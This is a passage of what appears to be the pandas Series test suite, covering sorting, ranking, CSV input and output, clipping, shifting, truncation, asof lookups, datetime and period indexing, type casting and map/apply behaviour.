self.assert_numpy_array_equal(result[5:], np.sort(vals[5:]))\n\n # something object-type\n ser = Series(['A', 'B'], [1, 2])\n # no failure\n ser.order()\n\n # ascending=False\n ordered = ts.order(ascending=False)\n expected = np.sort(ts.valid().values)[::-1]\n assert_almost_equal(expected, ordered.valid().values)\n ordered = ts.order(ascending=False, na_position='first')\n assert_almost_equal(expected, ordered.valid().values)\n\n def test_nsmallest_nlargest(self):\n # float, int, datetime64 (use i8), timedelts64 (same),\n # object that are numbers, object that are strings\n\n base = 
[3, 2, 1, 2, 5]\n\n s_list = [\n Series(base, dtype='int8'),\n Series(base, dtype='int16'),\n Series(base, dtype='int32'),\n Series(base, dtype='int64'),\n Series(base, dtype='float32'),\n Series(base, dtype='float64'),\n Series(base, dtype='uint8'),\n Series(base, dtype='uint16'),\n Series(base, dtype='uint32'),\n Series(base, dtype='uint64'),\n Series(base).astype('timedelta64[ns]'),\n Series(pd.to_datetime(['2003', '2002', '2001', '2002', '2005'])),\n ]\n\n raising = [\n Series([3., 2, 1, 2, '5'], dtype='object'),\n Series([3., 2, 1, 2, 5], dtype='object'),\n # not supported on some archs\n # Series([3., 2, 1, 2, 5], dtype='complex256'),\n Series([3., 2, 1, 2, 5], dtype='complex128'),\n ]\n\n for r in raising:\n dt = r.dtype\n msg = \"Cannot use method 'n(larg|small)est' with dtype %s\" % dt\n args = 2, len(r), 0, -1\n methods = r.nlargest, r.nsmallest\n for method, arg in product(methods, args):\n with tm.assertRaisesRegexp(TypeError, msg):\n method(arg)\n\n for s in s_list:\n\n assert_series_equal(s.nsmallest(2), s.iloc[[2, 1]])\n assert_series_equal(s.nsmallest(2, take_last=True), s.iloc[[2, 3]])\n\n assert_series_equal(s.nlargest(3), s.iloc[[4, 0, 1]])\n assert_series_equal(s.nlargest(3, take_last=True),\n s.iloc[[4, 0, 3]])\n\n empty = s.iloc[0:0]\n assert_series_equal(s.nsmallest(0), empty)\n assert_series_equal(s.nsmallest(-1), empty)\n assert_series_equal(s.nlargest(0), empty)\n assert_series_equal(s.nlargest(-1), empty)\n\n assert_series_equal(s.nsmallest(len(s)), s.order())\n assert_series_equal(s.nsmallest(len(s) + 1), s.order())\n assert_series_equal(s.nlargest(len(s)), s.iloc[[4, 0, 1, 3, 2]])\n assert_series_equal(s.nlargest(len(s) + 1),\n s.iloc[[4, 0, 1, 3, 2]])\n\n s = Series([3., np.nan, 1, 2, 5])\n assert_series_equal(s.nlargest(), s.iloc[[4, 0, 3, 2]])\n assert_series_equal(s.nsmallest(), s.iloc[[2, 3, 0, 4]])\n\n def test_rank(self):\n tm._skip_if_no_scipy()\n from scipy.stats import rankdata\n\n self.ts[::2] = np.nan\n self.ts[:10][::3] = 4.\n\n ranks = self.ts.rank()\n oranks = self.ts.astype('O').rank()\n\n assert_series_equal(ranks, oranks)\n\n mask = np.isnan(self.ts)\n filled = self.ts.fillna(np.inf)\n\n # rankdata returns a ndarray\n exp = Series(rankdata(filled),index=filled.index)\n exp[mask] = np.nan\n\n assert_almost_equal(ranks, exp)\n\n iseries = Series(np.arange(5).repeat(2))\n\n iranks = iseries.rank()\n exp = iseries.astype(float).rank()\n assert_series_equal(iranks, exp)\n iseries = Series(np.arange(5)) + 1.0\n exp = iseries / 5.0\n iranks = iseries.rank(pct=True)\n\n assert_series_equal(iranks, exp)\n\n iseries = Series(np.repeat(1, 100))\n exp = Series(np.repeat(0.505, 100))\n iranks = iseries.rank(pct=True)\n assert_series_equal(iranks, exp)\n\n iseries[1] = np.nan\n exp = Series(np.repeat(50.0 / 99.0, 100))\n exp[1] = np.nan\n iranks = iseries.rank(pct=True)\n assert_series_equal(iranks, exp)\n\n iseries = Series(np.arange(5)) + 1.0\n iseries[4] = np.nan\n exp = iseries / 4.0\n iranks = iseries.rank(pct=True)\n assert_series_equal(iranks, exp)\n\n iseries = Series(np.repeat(np.nan, 100))\n exp = iseries.copy()\n iranks = iseries.rank(pct=True)\n assert_series_equal(iranks, exp)\n\n iseries = Series(np.arange(5)) + 1\n iseries[4] = np.nan\n exp = iseries / 4.0\n iranks = iseries.rank(pct=True)\n assert_series_equal(iranks, exp)\n\n rng = date_range('1/1/1990', periods=5)\n iseries = Series(np.arange(5), rng) + 1\n iseries.ix[4] = np.nan\n exp = iseries / 4.0\n iranks = iseries.rank(pct=True)\n assert_series_equal(iranks, exp)\n\n iseries = 
Series([1e-50, 1e-100, 1e-20, 1e-2, 1e-20+1e-30, 1e-1])\n exp = Series([2, 1, 3.5, 5, 3.5, 6])\n iranks = iseries.rank()\n assert_series_equal(iranks, exp)\n\n values = np.array([-50, -1, -1e-20, -1e-25, -1e-50, 0, 1e-40, 1e-20, 1e-10, 2, 40], dtype='float64')\n random_order = np.random.permutation(len(values))\n iseries = Series(values[random_order])\n exp = Series(random_order + 1.0, dtype='float64')\n iranks = iseries.rank()\n assert_series_equal(iranks, exp)\n\n def test_rank_inf(self):\n raise nose.SkipTest('DataFrame.rank does not currently rank np.inf and -np.inf properly')\n\n values = np.array([-np.inf, -50, -1, -1e-20, -1e-25, -1e-50, 0, 1e-40, 1e-20, 1e-10, 2, 40, np.inf], dtype='float64')\n random_order = np.random.permutation(len(values))\n iseries = Series(values[random_order])\n exp = Series(random_order + 1.0, dtype='float64')\n iranks = iseries.rank()\n assert_series_equal(iranks, exp)\n\n\n def test_from_csv(self):\n\n with ensure_clean() as path:\n self.ts.to_csv(path)\n ts = Series.from_csv(path)\n assert_series_equal(self.ts, ts)\n self.assertTrue(ts.index.name is None)\n\n self.series.to_csv(path)\n series = Series.from_csv(path)\n self.assertIsNone(series.name)\n self.assertIsNone(series.index.name)\n assert_series_equal(self.series, series)\n\n outfile = open(path, 'w')\n outfile.write('1998-01-01|1.0\\n1999-01-01|2.0')\n outfile.close()\n series = Series.from_csv(path, sep='|')\n checkseries = Series(\n {datetime(1998, 1, 1): 1.0, datetime(1999, 1, 1): 2.0})\n assert_series_equal(checkseries, series)\n\n series = Series.from_csv(path, sep='|', parse_dates=False)\n checkseries = Series({'1998-01-01': 1.0, '1999-01-01': 2.0})\n assert_series_equal(checkseries, series)\n\n def test_to_csv(self):\n import io\n\n with ensure_clean() as path:\n self.ts.to_csv(path)\n\n lines = io.open(path, newline=None).readlines()\n assert(lines[1] != '\\n')\n\n self.ts.to_csv(path, index=False)\n arr = np.loadtxt(path)\n assert_almost_equal(arr, self.ts.values)\n\n def test_to_csv_unicode_index(self):\n buf = StringIO()\n s = Series([u(\"\\u05d0\"), \"d2\"], index=[u(\"\\u05d0\"), u(\"\\u05d1\")])\n\n s.to_csv(buf, encoding='UTF-8')\n buf.seek(0)\n\n s2 = Series.from_csv(buf, index_col=0, encoding='UTF-8')\n\n assert_series_equal(s, s2)\n\n def test_tolist(self):\n rs = self.ts.tolist()\n xp = self.ts.values.tolist()\n assert_almost_equal(rs, xp)\n\n # datetime64\n s = Series(self.ts.index)\n rs = s.tolist()\n self.assertEqual(self.ts.index[0], rs[0])\n\n def test_to_frame(self):\n self.ts.name = None\n rs = self.ts.to_frame()\n xp = pd.DataFrame(self.ts.values, index=self.ts.index)\n assert_frame_equal(rs, xp)\n\n self.ts.name = 'testname'\n rs = self.ts.to_frame()\n xp = pd.DataFrame(dict(testname=self.ts.values), index=self.ts.index)\n assert_frame_equal(rs, xp)\n\n rs = self.ts.to_frame(name='testdifferent')\n xp = pd.DataFrame(dict(testdifferent=self.ts.values), index=self.ts.index)\n assert_frame_equal(rs, xp)\n\n def test_to_dict(self):\n self.assert_numpy_array_equal(Series(self.ts.to_dict()), self.ts)\n\n def test_to_csv_float_format(self):\n\n with ensure_clean() as filename:\n ser = Series([0.123456, 0.234567, 0.567567])\n ser.to_csv(filename, float_format='%.2f')\n\n rs = Series.from_csv(filename)\n xp = Series([0.12, 0.23, 0.57])\n assert_series_equal(rs, xp)\n\n def test_to_csv_list_entries(self):\n s = Series(['jack and jill', 'jesse and frank'])\n\n split = s.str.split(r'\\s+and\\s+')\n\n buf = StringIO()\n split.to_csv(buf)\n\n def test_to_csv_path_is_none(self):\n # 
GH 8215\n # Series.to_csv() was returning None, inconsistent with\n # DataFrame.to_csv() which returned string\n s = Series([1, 2, 3])\n csv_str = s.to_csv(path=None)\n self.assertIsInstance(csv_str, str)\n\n def test_clip(self):\n val = self.ts.median()\n\n self.assertEqual(self.ts.clip_lower(val).min(), val)\n self.assertEqual(self.ts.clip_upper(val).max(), val)\n\n self.assertEqual(self.ts.clip(lower=val).min(), val)\n self.assertEqual(self.ts.clip(upper=val).max(), val)\n\n result = self.ts.clip(-0.5, 0.5)\n expected = np.clip(self.ts, -0.5, 0.5)\n assert_series_equal(result, expected)\n tm.assert_isinstance(expected, Series)\n\n def test_clip_types_and_nulls(self):\n\n sers = [Series([np.nan, 1.0, 2.0, 3.0]),\n Series([None, 'a', 'b', 'c']),\n Series(pd.to_datetime([np.nan, 1, 2, 3], unit='D'))]\n\n for s in sers:\n thresh = s[2]\n l = s.clip_lower(thresh)\n u = s.clip_upper(thresh)\n self.assertEqual(l[notnull(l)].min(), thresh)\n self.assertEqual(u[notnull(u)].max(), thresh)\n self.assertEqual(list(isnull(s)), list(isnull(l)))\n self.assertEqual(list(isnull(s)), list(isnull(u)))\n\n def test_valid(self):\n ts = self.ts.copy()\n ts[::2] = np.NaN\n\n result = ts.valid()\n self.assertEqual(len(result), ts.count())\n\n tm.assert_dict_equal(result, ts, compare_keys=False)\n\n def test_isnull(self):\n ser = Series([0, 5.4, 3, nan, -0.001])\n np.array_equal(\n ser.isnull(), Series([False, False, False, True, False]).values)\n ser = Series([\"hi\", \"\", nan])\n np.array_equal(ser.isnull(), Series([False, False, True]).values)\n\n def test_notnull(self):\n ser = Series([0, 5.4, 3, nan, -0.001])\n np.array_equal(\n ser.notnull(), Series([True, True, True, False, True]).values)\n ser = Series([\"hi\", \"\", nan])\n np.array_equal(ser.notnull(), Series([True, True, False]).values)\n\n def test_shift(self):\n shifted = self.ts.shift(1)\n unshifted = shifted.shift(-1)\n\n tm.assert_dict_equal(unshifted.valid(), self.ts, compare_keys=False)\n\n offset = datetools.bday\n shifted = self.ts.shift(1, freq=offset)\n unshifted = shifted.shift(-1, freq=offset)\n\n assert_series_equal(unshifted, self.ts)\n\n unshifted = self.ts.shift(0, freq=offset)\n assert_series_equal(unshifted, self.ts)\n\n shifted = self.ts.shift(1, freq='B')\n unshifted = shifted.shift(-1, freq='B')\n\n assert_series_equal(unshifted, self.ts)\n\n # corner case\n unshifted = self.ts.shift(0)\n assert_series_equal(unshifted, self.ts)\n\n # Shifting with PeriodIndex\n ps = tm.makePeriodSeries()\n shifted = ps.shift(1)\n unshifted = shifted.shift(-1)\n tm.assert_dict_equal(unshifted.valid(), ps, compare_keys=False)\n\n shifted2 = ps.shift(1, 'B')\n shifted3 = ps.shift(1, datetools.bday)\n assert_series_equal(shifted2, shifted3)\n assert_series_equal(ps, shifted2.shift(-1, 'B'))\n\n self.assertRaises(ValueError, ps.shift, freq='D')\n\n # legacy support\n shifted4 = ps.shift(1, timeRule='B')\n assert_series_equal(shifted2, shifted4)\n\n shifted5 = ps.shift(1, offset=datetools.bday)\n assert_series_equal(shifted5, shifted4)\n\n # 32-bit taking\n # GH 8129\n index=date_range('2000-01-01',periods=5)\n for dtype in ['int32','int64']:\n s1 = Series(np.arange(5,dtype=dtype),index=index)\n p = s1.iloc[1]\n result = s1.shift(periods=p)\n expected = Series([np.nan,0,1,2,3],index=index)\n assert_series_equal(result,expected)\n\n def test_tshift(self):\n # PeriodIndex\n ps = tm.makePeriodSeries()\n shifted = ps.tshift(1)\n unshifted = shifted.tshift(-1)\n\n assert_series_equal(unshifted, ps)\n\n shifted2 = ps.tshift(freq='B')\n 
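# tshift with only a freq argument defaults to periods=1, so it should equal the explicit tshift(1) above\n        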
assert_series_equal(shifted, shifted2)\n\n shifted3 = ps.tshift(freq=datetools.bday)\n assert_series_equal(shifted, shifted3)\n\n self.assertRaises(ValueError, ps.tshift, freq='M')\n\n # DatetimeIndex\n shifted = self.ts.tshift(1)\n unshifted = shifted.tshift(-1)\n\n assert_series_equal(self.ts, unshifted)\n\n shifted2 = self.ts.tshift(freq=self.ts.index.freq)\n assert_series_equal(shifted, shifted2)\n\n inferred_ts = Series(self.ts.values, Index(np.asarray(self.ts.index)))\n shifted = inferred_ts.tshift(1)\n unshifted = shifted.tshift(-1)\n assert_series_equal(shifted, self.ts.tshift(1))\n assert_series_equal(unshifted, inferred_ts)\n\n no_freq = self.ts[[0, 5, 7]]\n self.assertRaises(ValueError, no_freq.tshift)\n\n def test_shift_int(self):\n ts = self.ts.astype(int)\n shifted = ts.shift(1)\n expected = ts.astype(float).shift(1)\n assert_series_equal(shifted, expected)\n\n def test_truncate(self):\n offset = datetools.bday\n\n ts = self.ts[::3]\n\n start, end = self.ts.index[3], self.ts.index[6]\n start_missing, end_missing = self.ts.index[2], self.ts.index[7]\n\n # neither specified\n truncated = ts.truncate()\n assert_series_equal(truncated, ts)\n\n # both specified\n expected = ts[1:3]\n\n truncated = ts.truncate(start, end)\n assert_series_equal(truncated, expected)\n\n truncated = ts.truncate(start_missing, end_missing)\n assert_series_equal(truncated, expected)\n\n # start specified\n expected = ts[1:]\n\n truncated = ts.truncate(before=start)\n assert_series_equal(truncated, expected)\n\n truncated = ts.truncate(before=start_missing)\n assert_series_equal(truncated, expected)\n\n # end specified\n expected = ts[:3]\n\n truncated = ts.truncate(after=end)\n assert_series_equal(truncated, expected)\n\n truncated = ts.truncate(after=end_missing)\n assert_series_equal(truncated, expected)\n\n # corner case, empty series returned\n truncated = ts.truncate(after=self.ts.index[0] - offset)\n assert(len(truncated) == 0)\n\n truncated = ts.truncate(before=self.ts.index[-1] + offset)\n assert(len(truncated) == 0)\n\n self.assertRaises(ValueError, ts.truncate,\n before=self.ts.index[-1] + offset,\n after=self.ts.index[0] - offset)\n\n def test_ptp(self):\n N = 1000\n arr = np.random.randn(N)\n ser = Series(arr)\n self.assertEqual(np.ptp(ser), np.ptp(arr))\n\n def test_asof(self):\n # array or list or dates\n N = 50\n rng = date_range('1/1/1990', periods=N, freq='53s')\n ts = Series(np.random.randn(N), index=rng)\n ts[15:30] = np.nan\n dates = date_range('1/1/1990', periods=N * 3, freq='25s')\n\n result = ts.asof(dates)\n self.assertTrue(notnull(result).all())\n lb = ts.index[14]\n ub = ts.index[30]\n\n result = ts.asof(list(dates))\n self.assertTrue(notnull(result).all())\n lb = ts.index[14]\n ub = ts.index[30]\n\n mask = (result.index >= lb) & (result.index < ub)\n rs = result[mask]\n self.assertTrue((rs == ts[lb]).all())\n\n val = result[result.index[result.index >= ub][0]]\n self.assertEqual(ts[ub], val)\n\n self.ts[5:10] = np.NaN\n self.ts[15:20] = np.NaN\n\n val1 = self.ts.asof(self.ts.index[7])\n val2 = self.ts.asof(self.ts.index[19])\n\n self.assertEqual(val1, self.ts[4])\n self.assertEqual(val2, self.ts[14])\n\n # accepts strings\n val1 = self.ts.asof(str(self.ts.index[7]))\n self.assertEqual(val1, self.ts[4])\n\n # in there\n self.assertEqual(self.ts.asof(self.ts.index[3]), self.ts[3])\n\n # no as of value\n d = self.ts.index[0] - datetools.bday\n self.assertTrue(np.isnan(self.ts.asof(d)))\n\n def test_getitem_setitem_datetimeindex(self):\n from pandas import date_range\n N = 50\n # 
testing with timezone, GH #2785\n rng = date_range('1/1/1990', periods=N, freq='H', tz='US/Eastern')\n ts = Series(np.random.randn(N), index=rng)\n\n result = ts[\"1990-01-01 04:00:00\"]\n expected = ts[4]\n self.assertEqual(result, expected)\n\n result = ts.copy()\n result[\"1990-01-01 04:00:00\"] = 0\n result[\"1990-01-01 04:00:00\"] = ts[4]\n assert_series_equal(result, ts)\n\n result = ts[\"1990-01-01 04:00:00\":\"1990-01-01 07:00:00\"]\n expected = ts[4:8]\n assert_series_equal(result, expected)\n\n result = ts.copy()\n result[\"1990-01-01 04:00:00\":\"1990-01-01 07:00:00\"] = 0\n result[\"1990-01-01 04:00:00\":\"1990-01-01 07:00:00\"] = ts[4:8]\n assert_series_equal(result, ts)\n\n lb = \"1990-01-01 04:00:00\"\n rb = \"1990-01-01 07:00:00\"\n result = ts[(ts.index >= lb) & (ts.index <= rb)]\n expected = ts[4:8]\n assert_series_equal(result, expected)\n\n # repeat all the above with naive datetimes\n result = ts[datetime(1990, 1, 1, 4)]\n expected = ts[4]\n self.assertEqual(result, expected)\n\n result = ts.copy()\n result[datetime(1990, 1, 1, 4)] = 0\n result[datetime(1990, 1, 1, 4)] = ts[4]\n assert_series_equal(result, ts)\n\n result = ts[datetime(1990, 1, 1, 4):datetime(1990, 1, 1, 7)]\n expected = ts[4:8]\n assert_series_equal(result, expected)\n\n result = ts.copy()\n result[datetime(1990, 1, 1, 4):datetime(1990, 1, 1, 7)] = 0\n result[datetime(1990, 1, 1, 4):datetime(1990, 1, 1, 7)] = ts[4:8]\n assert_series_equal(result, ts)\n\n lb = datetime(1990, 1, 1, 4)\n rb = datetime(1990, 1, 1, 7)\n result = ts[(ts.index >= lb) & (ts.index <= rb)]\n expected = ts[4:8]\n assert_series_equal(result, expected)\n\n result = ts[ts.index[4]]\n expected = ts[4]\n self.assertEqual(result, expected)\n\n result = ts[ts.index[4:8]]\n expected = ts[4:8]\n assert_series_equal(result, expected)\n\n result = ts.copy()\n result[ts.index[4:8]] = 0\n result[4:8] = ts[4:8]\n assert_series_equal(result, ts)\n\n # also test partial date slicing\n result = ts[\"1990-01-02\"]\n expected = ts[24:48]\n assert_series_equal(result, expected)\n\n result = ts.copy()\n result[\"1990-01-02\"] = 0\n result[\"1990-01-02\"] = ts[24:48]\n assert_series_equal(result, ts)\n\n def test_getitem_setitem_datetime_tz_pytz(self):\n tm._skip_if_no_pytz();\n from pytz import timezone as tz\n\n from pandas import date_range\n N = 50\n # testing with timezone, GH #2785\n rng = date_range('1/1/1990', periods=N, freq='H', tz='US/Eastern')\n ts = Series(np.random.randn(N), index=rng)\n\n # also test Timestamp tz handling, GH #2789\n result = ts.copy()\n result[\"1990-01-01 09:00:00+00:00\"] = 0\n result[\"1990-01-01 09:00:00+00:00\"] = ts[4]\n assert_series_equal(result, ts)\n\n result = ts.copy()\n result[\"1990-01-01 03:00:00-06:00\"] = 0\n result[\"1990-01-01 03:00:00-06:00\"] = ts[4]\n assert_series_equal(result, ts)\n\n # repeat with datetimes\n result = ts.copy()\n result[datetime(1990, 1, 1, 9, tzinfo=tz('UTC'))] = 0\n result[datetime(1990, 1, 1, 9, tzinfo=tz('UTC'))] = ts[4]\n assert_series_equal(result, ts)\n\n result = ts.copy()\n\n # comparison dates with datetime MUST be localized!\n date = tz('US/Central').localize(datetime(1990, 1, 1, 3))\n result[date] = 0\n result[date] = ts[4]\n assert_series_equal(result, ts)\n\n\n def test_getitem_setitem_datetime_tz_dateutil(self):\n tm._skip_if_no_dateutil();\n from dateutil.tz import tzutc\n from dateutil.zoneinfo import gettz\n tz = lambda x: tzutc() if x == 'UTC' else gettz(x) # handle special case for utc in dateutil\n\n from pandas import date_range\n N = 50\n # testing with 
timezone, GH #2785\n rng = date_range('1/1/1990', periods=N, freq='H', tz='US/Eastern')\n ts = Series(np.random.randn(N), index=rng)\n\n # also test Timestamp tz handling, GH #2789\n result = ts.copy()\n result[\"1990-01-01 09:00:00+00:00\"] = 0\n result[\"1990-01-01 09:00:00+00:00\"] = ts[4]\n assert_series_equal(result, ts)\n\n result = ts.copy()\n result[\"1990-01-01 03:00:00-06:00\"] = 0\n result[\"1990-01-01 03:00:00-06:00\"] = ts[4]\n assert_series_equal(result, ts)\n\n # repeat with datetimes\n result = ts.copy()\n result[datetime(1990, 1, 1, 9, tzinfo=tz('UTC'))] = 0\n result[datetime(1990, 1, 1, 9, tzinfo=tz('UTC'))] = ts[4]\n assert_series_equal(result, ts)\n\n result = ts.copy()\n result[datetime(1990, 1, 1, 3, tzinfo=tz('US/Central'))] = 0\n result[datetime(1990, 1, 1, 3, tzinfo=tz('US/Central'))] = ts[4]\n assert_series_equal(result, ts)\n\n def test_getitem_setitem_periodindex(self):\n from pandas import period_range\n N = 50\n rng = period_range('1/1/1990', periods=N, freq='H')\n ts = Series(np.random.randn(N), index=rng)\n\n result = ts[\"1990-01-01 04\"]\n expected = ts[4]\n self.assertEqual(result, expected)\n\n result = ts.copy()\n result[\"1990-01-01 04\"] = 0\n result[\"1990-01-01 04\"] = ts[4]\n assert_series_equal(result, ts)\n\n result = ts[\"1990-01-01 04\":\"1990-01-01 07\"]\n expected = ts[4:8]\n assert_series_equal(result, expected)\n\n result = ts.copy()\n result[\"1990-01-01 04\":\"1990-01-01 07\"] = 0\n result[\"1990-01-01 04\":\"1990-01-01 07\"] = ts[4:8]\n assert_series_equal(result, ts)\n\n lb = \"1990-01-01 04\"\n rb = \"1990-01-01 07\"\n result = ts[(ts.index >= lb) & (ts.index <= rb)]\n expected = ts[4:8]\n assert_series_equal(result, expected)\n\n # GH 2782\n result = ts[ts.index[4]]\n expected = ts[4]\n self.assertEqual(result, expected)\n\n result = ts[ts.index[4:8]]\n expected = ts[4:8]\n assert_series_equal(result, expected)\n\n result = ts.copy()\n result[ts.index[4:8]] = 0\n result[4:8] = ts[4:8]\n assert_series_equal(result, ts)\n\n def test_asof_periodindex(self):\n from pandas import period_range, PeriodIndex\n # array or list or dates\n N = 50\n rng = period_range('1/1/1990', periods=N, freq='H')\n ts = Series(np.random.randn(N), index=rng)\n ts[15:30] = np.nan\n dates = date_range('1/1/1990', periods=N * 3, freq='37min')\n\n result = ts.asof(dates)\n self.assertTrue(notnull(result).all())\n lb = ts.index[14]\n ub = ts.index[30]\n\n result = ts.asof(list(dates))\n self.assertTrue(notnull(result).all())\n lb = ts.index[14]\n ub = ts.index[30]\n\n pix = PeriodIndex(result.index.values, freq='H')\n mask = (pix >= lb) & (pix < ub)\n rs = result[mask]\n self.assertTrue((rs == ts[lb]).all())\n\n ts[5:10] = np.NaN\n ts[15:20] = np.NaN\n\n val1 = ts.asof(ts.index[7])\n val2 = ts.asof(ts.index[19])\n\n self.assertEqual(val1, ts[4])\n self.assertEqual(val2, ts[14])\n\n # accepts strings\n val1 = ts.asof(str(ts.index[7]))\n self.assertEqual(val1, ts[4])\n\n # in there\n self.assertEqual(ts.asof(ts.index[3]), ts[3])\n\n # no as of value\n d = ts.index[0].to_timestamp() - datetools.bday\n self.assertTrue(np.isnan(ts.asof(d)))\n\n def test_asof_more(self):\n from pandas import date_range\n s = Series([nan, nan, 1, 2, nan, nan, 3, 4, 5],\n index=date_range('1/1/2000', periods=9))\n\n dates = s.index[[4, 5, 6, 2, 1]]\n\n result = s.asof(dates)\n expected = Series([2, 2, 3, 1, np.nan], index=dates)\n\n assert_series_equal(result, expected)\n\n s = Series([1.5, 2.5, 1, 2, nan, nan, 3, 4, 5],\n index=date_range('1/1/2000', periods=9))\n result = 
s.asof(s.index[0])\n self.assertEqual(result, s[0])\n\n def test_cast_on_putmask(self):\n\n # GH 2746\n\n # need to upcast\n s = Series([1, 2], index=[1, 2], dtype='int64')\n s[[True, False]] = Series([0], index=[1], dtype='int64')\n expected = Series([0, 2], index=[1, 2], dtype='int64')\n\n assert_series_equal(s, expected)\n\n def test_type_promote_putmask(self):\n\n # GH8387: test that changing types does not break alignment\n ts = Series(np.random.randn(100), index=np.arange(100,0,-1)).round(5)\n left, mask = ts.copy(), ts > 0\n right = ts[mask].copy().map(str)\n left[mask] = right\n assert_series_equal(left, ts.map(lambda t: str(t) if t > 0 else t))\n\n s = Series([0, 1, 2, 0 ])\n mask = s > 0\n s2 = s[ mask ].map( str )\n s[mask] = s2\n assert_series_equal(s, Series([0, '1', '2', 0]))\n\n s = Series([0, 'foo', 'bar', 0 ])\n mask = Series([False, True, True, False])\n s2 = s[ mask ]\n s[mask] = s2\n assert_series_equal(s, Series([0, 'foo','bar', 0]))\n\n def test_astype_cast_nan_int(self):\n df = Series([1.0, 2.0, 3.0, np.nan])\n self.assertRaises(ValueError, df.astype, np.int64)\n\n def test_astype_cast_object_int(self):\n arr = Series([\"car\", \"house\", \"tree\", \"1\"])\n\n self.assertRaises(ValueError, arr.astype, int)\n self.assertRaises(ValueError, arr.astype, np.int64)\n self.assertRaises(ValueError, arr.astype, np.int8)\n\n arr = Series(['1', '2', '3', '4'], dtype=object)\n result = arr.astype(int)\n self.assert_numpy_array_equal(result, np.arange(1, 5))\n\n def test_astype_datetimes(self):\n import pandas.tslib as tslib\n\n s = Series(tslib.iNaT, dtype='M8[ns]', index=lrange(5))\n s = s.astype('O')\n self.assertEqual(s.dtype, np.object_)\n\n s = Series([datetime(2001, 1, 2, 0, 0)])\n s = s.astype('O')\n self.assertEqual(s.dtype, np.object_)\n\n s = Series([datetime(2001, 1, 2, 0, 0) for i in range(3)])\n s[1] = np.nan\n self.assertEqual(s.dtype, 'M8[ns]')\n s = s.astype('O')\n self.assertEqual(s.dtype, np.object_)\n\n def test_astype_str(self):\n # GH4405\n digits = string.digits\n s1 = Series([digits * 10, tm.rands(63), tm.rands(64),\n tm.rands(1000)])\n s2 = Series([digits * 10, tm.rands(63), tm.rands(64), nan, 1.0])\n types = (compat.text_type, np.str_)\n for typ in types:\n for s in (s1, s2):\n res = s.astype(typ)\n expec = s.map(compat.text_type)\n assert_series_equal(res, expec)\n\n def test_astype_unicode(self):\n\n # GH7758\n # a bit of magic is required to set default encoding encoding to utf-8\n digits = string.digits\n test_series = [\n Series([digits * 10, tm.rands(63), tm.rands(64), tm.rands(1000)]),\n Series([u('データーサイエンス、お前はもう死んでいる')]),\n\n ]\n\n former_encoding = None\n if not compat.PY3:\n # in python we can force the default encoding\n # for this test\n former_encoding = sys.getdefaultencoding()\n reload(sys)\n sys.setdefaultencoding(\"utf-8\")\n if sys.getdefaultencoding() == \"utf-8\":\n test_series.append(Series([u('野菜食べないとやばい').encode(\"utf-8\")]))\n for s in test_series:\n res = s.astype(\"unicode\")\n expec = s.map(compat.text_type)\n assert_series_equal(res, expec)\n # restore the former encoding\n if former_encoding is not None and former_encoding != \"utf-8\":\n reload(sys)\n sys.setdefaultencoding(former_encoding)\n\n\n def test_map(self):\n index, data = tm.getMixedTypeDict()\n\n source = Series(data['B'], index=data['C'])\n target = Series(data['C'][:4], index=data['D'][:4])\n\n merged = target.map(source)\n\n for k, v in compat.iteritems(merged):\n self.assertEqual(v, source[target[k]])\n\n # input could be a dict\n merged = 
target.map(source.to_dict())\n\n for k, v in compat.iteritems(merged):\n self.assertEqual(v, source[target[k]])\n\n # function\n result = self.ts.map(lambda x: x * 2)\n self.assert_numpy_array_equal(result, self.ts * 2)\n\n def test_map_compat(self):\n # related GH 8024\n s = Series([True,True,False],index=[1,2,3])\n result = s.map({ True : 'foo', False : 'bar' })\n expected = Series(['foo','foo','bar'],index=[1,2,3])\n assert_series_equal(result,expected)\n\n def test_map_int(self):\n left = Series({'a': 1., 'b': 2., 'c': 3., 'd': 4})\n right = Series({1: 11, 2: 22, 3: 33})\n\n self.assertEqual(left.dtype, np.float_)\n self.assertTrue(issubclass(right.dtype.type, np.integer))\n\n merged = left.map(right)\n self.assertEqual(merged.dtype, np.float_)\n self.assertTrue(isnull(merged['d']))\n self.assertTrue(not isnull(merged['c']))\n\n def test_map_type_inference(self):\n s = Series(lrange(3))\n s2 = s.map(lambda x: np.where(x == 0, 0, 1))\n self.assertTrue(issubclass(s2.dtype.type, np.integer))\n\n def test_map_decimal(self):\n from decimal import Decimal\n\n result = self.series.map(lambda x: Decimal(str(x)))\n self.assertEqual(result.dtype, np.object_)\n tm.assert_isinstance(result[0], Decimal)\n\n def test_map_na_exclusion(self):\n s = Series([1.5, np.nan, 3, np.nan, 5])\n\n result = s.map(lambda x: x * 2, na_action='ignore')\n exp = s * 2\n assert_series_equal(result, exp)\n\n def test_map_dict_with_tuple_keys(self):\n '''\n Due to new MultiIndex-ing behaviour in v0.14.0,\n dicts with tuple keys passed to map were being\n converted to a multi-index, preventing tuple values\n from being mapped properly.\n '''\n df = pd.DataFrame({'a': [(1,), (2,), (3, 4), (5, 6)]})\n label_mappings = {\n (1,): 'A',\n (2,): 'B',\n (3, 4): 'A',\n (5, 6): 'B'\n }\n df['labels'] = df['a'].map(label_mappings)\n df['expected_labels'] = pd.Series(['A', 'B', 'A', 'B'], index=df.index)\n # All labels should be filled now\n tm.assert_series_equal(df['labels'], df['expected_labels'])\n\n def test_apply(self):\n assert_series_equal(self.ts.apply(np.sqrt), np.sqrt(self.ts))\n\n # elementwise-apply\n import math\n assert_series_equal(self.ts.apply(math.exp), np.exp(self.ts))\n\n # how to handle Series result, #2316\n result = self.ts.apply(lambda x: Series([x, x ** 2],\n index=['x', 'x^2']))\n expected = DataFrame({'x': self.ts, 'x^2': self.ts ** 2})\n tm.assert_frame_equal(result, expected)\n\n # empty series\n s = Series(dtype=object, name='foo', index=pd.Index([], name='bar'))\n rs = s.apply(lambda x: x)\n tm.assert_series_equal(s, rs)\n # check all metadata (GH 9322)\n self.assertIsNot(s, rs)\n self.assertIs(s.index, rs.index)\n self.assertEqual(s.dtype, rs.dtype)\n self.assertEqual(s.name, rs.name)\n\n # index but no data\n s = Series(index=[1, 2, 3])\n rs = s.apply(lambda x: x)\n tm.assert_series_equal(s, rs)\n\n def test_apply_same_length_inference_bug(self):\n s = Series([1, 2])\n f = lambda x: (x, x + 1)\n\n result = s.apply(f)\n expected = s.map(f)\n assert_series_equal(result, expected)\n\n s = Series([1, 2, 3])\n result = s.apply(f)\n expected = s.map(f)\n assert_series_equal(result, expected)\n\n def test_apply_dont_convert_dtype(self):\n s = Series(np.random.randn(10))\n\n f = lambda x: x if x > 0 else np.nan\n result = s.apply(f, convert_dtype=False)\n self.assertEqual(result.dtype, object)\n\n def 